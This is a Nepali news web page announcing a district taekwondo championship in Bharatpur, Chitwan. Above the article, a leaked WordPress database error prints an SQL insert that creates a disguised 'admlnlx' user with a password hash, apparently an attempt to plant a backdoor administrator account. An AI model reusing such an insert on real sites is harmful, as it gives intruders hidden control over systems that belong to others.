WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Bf4GmQc3LwJFS8meyGtm0AvPi/7EV51', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-14 13:45:52', '', 'admlnlx', 'admlnlx')
चितवन, माघ १८–
लियो क्लव अफ भरतपुरको आयोजनामा प्रथम जिल्ला स्तरीय तेक्वान्दो च्याम्पियनसीप प्रतियोगिता हुने भएको छ ।
आज भरतपुरमा पत्रकार सम्मेलनगरि यही माघ २१ र २२ गते हुने प्रतियोगिता बारे जानकारी दिएको हो । प्रतियोगिता भरतपुरस्थित कवर्डहलमा हुनेछ । लियो क्लव अफ भरतपुरका अध्यक्ष प्रजिल श्रेष्ठले समाजसेवासंगै खेलकुद क्षेत्रको विकास लागि प्रतियोगिता आयोजना गर्न लागिएको जानकारी दिनुभयो । उहाँले प्रतियोगिताको तयारी अन्तिम चरणमा पुगेको जानकारी दिनुभयो ।
पत्रकार सम्मेलनमा बोल्दै जिल्ला तेक्वान्दो संघका अध्यक्ष विकास श्रेष्ठले प्रतियोगितामा जिल्लाभरका २० वटा डोजाङका कुल २ सय खेलाडीले सहभागिता जनाउने जानकारी दिनुभयो । सबै डोजाङहरुलाई निमन्त्रणा भई सकेको भन्दै उहाँले राष्ट्रिय स्तरको प्रतियोगिताको लागि यो प्रतियोगिता महत्वपूर्ण भएको जानकारी दिनुभयो । उहाँले सिनियर र जुनियर गरि १२ वटा तौल समूहमा भिडन्त हुने जानकारी दिनुभयो । यस प्रतियोगितामा माडीबाट पनि ३० खेलाडीले सहभागिता जनाउन लागेका छन् ।
प्रतियोगिता विजेता खेलाडीहरुलाई शिल्ड, मेडल र प्रमाण पत्र प्रदान गरिने छ । पत्रकार सम्मेलनमा जिल्ला करातेका रफि अन्सारी, लियो डिष्ट्रिक्ट ३२५ बी टु का रिजन कोर्डिनेटर मनोज खड्का, लियो डिष्ट्रिक्ट प्रेसिडेन्ट एडभाईजर सन्तोष मजाकोटी, खेलकुद पत्रकार मंचका महासचिव दीपेन्द्र अधिकारी, रिपोर्टर्स क्लव चितवनका अध्यक्ष एवंम लियो क्लव अफ नारायणगढका अध्यक्ष राजु चौधरी, लियो भरतपुरका प्रथम उपाध्यक्ष अनुप भुजेललगायतले बोल्नु भएको थियो ।